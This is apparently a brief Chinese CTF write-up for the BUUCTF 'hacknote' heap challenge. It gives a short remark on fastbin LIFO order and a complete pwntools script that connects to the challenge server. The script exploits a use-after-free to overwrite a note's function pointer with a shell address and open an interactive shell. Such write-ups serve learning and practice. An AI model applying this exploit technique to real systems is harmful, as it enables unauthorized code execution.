这道题可以用来当做堆的入门题来做
开了NX
这是堆的菜单;
因为fastbin是单向链表,遵循先进后出的原则
from pwn import*
p=remote('node3.buuoj.cn',26828)
#p = process('./hacknote')
#gdb.attach(p)
def add(size,content):
p.sendlineafter('choice :','1')
p.sendlineafter('Note size :',str(size))
p.sendlineafter('Content :',content)
def delete(index):
p.sendlineafter('choice :','2')
p.sendlineafter('Index :',str(index))
def printf(index):
p.sendlineafter('choice :','3')
p.sendlineafter('Index :',str(index))
shell_addr=0x8048945
add(40,'aaaa')
add(40,'bbbb')
delete(1)
delete(0)
add(8,p32(shell_addr))
printf(1)
p.interactive()